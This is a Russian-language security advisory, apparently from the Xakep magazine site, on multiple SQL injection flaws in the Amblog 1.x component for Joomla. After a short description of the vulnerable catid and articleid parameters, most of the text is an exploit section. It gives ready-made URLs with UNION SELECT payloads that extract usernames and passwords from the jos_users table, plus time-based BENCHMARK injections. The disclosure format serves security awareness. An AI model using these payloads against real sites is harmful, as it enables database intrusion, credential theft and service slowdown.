Множественные SQL-инъекции в Joomla! Amblog Component

Рекомендуем почитать:

Xakep #299. Sysmon

• Содержание выпуска
• Подписка на «Хакер»-60%

Программа: Amblog 1.x (component for Joomla!)

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения.

1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "catid" сценарием index.php (когда "option" установлен в "com_amblog"
и "view" установлен в "amblog"). Атакующий может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.

2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "catid" сценарием index.php (когда "option" установлен в "com_amblog"
и "task" установлен в "newform"). Атакующий может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.

3) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "articleid" сценарием index.php (когда "option" установлен в "com_amblog"
и "task" установлен в "article", "editform", "editcommentform", "savenewcomment",
"saveeditcomment", "editsave", или "delete"). Атакующий может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.

Эксплоит:

http://site/path/index.php?option=com_amblog&view=amblog&catid=-1 UNION
SELECT @@version

http://site/path/index.php?option=com_amblog&task=article&articleid=-1 UNION
SELECT
1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
FROM jos_users

http://site/path/index.php?option=com_amblog&task=newform&catid=-1 UNION SELECT
1,CONCAT(username,0x3a,password) FROM jos_users

http://site/path/index.php?option=com_amblog&task=editform&articleid=-1 UNION
SELECT
1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
FROM jos_users

http://site/path/index.php?option=com_amblog&task=editcommentform&articleid=-1
UNION SELECT
1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
FROM jos_users

http://site/path/index.php?option=com_amblog&task=savenewcomment&articleid=-1
UNION SELECT
1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
FROM jos_users

http://site/path/index.php?option=com_amblog&task=saveeditcomment&articleid=-1
UNION SELECT
1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
FROM jos_users

http://site/path/index.php?option=com_amblog&task=editsave&articleid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))

http://site/path/index.php?option=com_amblog&task=delete&articleid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))